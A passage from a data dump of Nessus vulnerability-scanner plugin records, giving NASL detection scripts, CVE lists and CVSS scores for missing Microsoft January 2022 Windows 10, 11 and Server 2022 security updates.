severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n|| \nsmb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-17T21:54:11", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21907, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21921, CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21861, CVE-2022-21862, CVE-2022-21864, CVE-2022-21866, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21881, CVE-2022-21882, CVE-2022-21885, CVE-2022-21887, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009566: Windows 11 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009566.NASL", "href": "https://www.tenable.com/plugins/nessus/156622", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156622);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21887\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009566\");\n script_xref(name:\"MSFT\", value:\"MS22-5009566\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009566: Windows 11 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21888, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21907, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21921,\n CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21861, CVE-2022-21862,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21870,\n CVE-2022-21871, CVE-2022-21872, CVE-2022-21873,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21885,\n CVE-2022-21887, CVE-2022-21896, CVE-2022-21897,\n CVE-2022-21901, CVE-2022-21902, CVE-2022-21908,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21847, CVE-2022-21848, CVE-2022-21883,\n CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009566\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5009566 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009566');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'22000',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009566])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-17T21:55:09", "description": "The remote Windows host is missing security update 5009545.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009545: Windows 10 Version 1909 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009545.NASL", "href": "https://www.tenable.com/plugins/nessus/156618", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156618);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21908\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009545\");\n script_xref(name:\"MSFT\", value:\"MS22-5009545\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009545: Windows 10 Version 1909 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009545.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009545\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009545.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21898\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009545');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009545])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-17T21:54:35", "description": "The Windows Server 2022 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21907, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21921, CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21861, CVE-2022-21862, CVE-2022-21864, CVE-2022-21866, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21881, CVE-2022-21882, CVE-2022-21885, CVE-2022-21887, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - 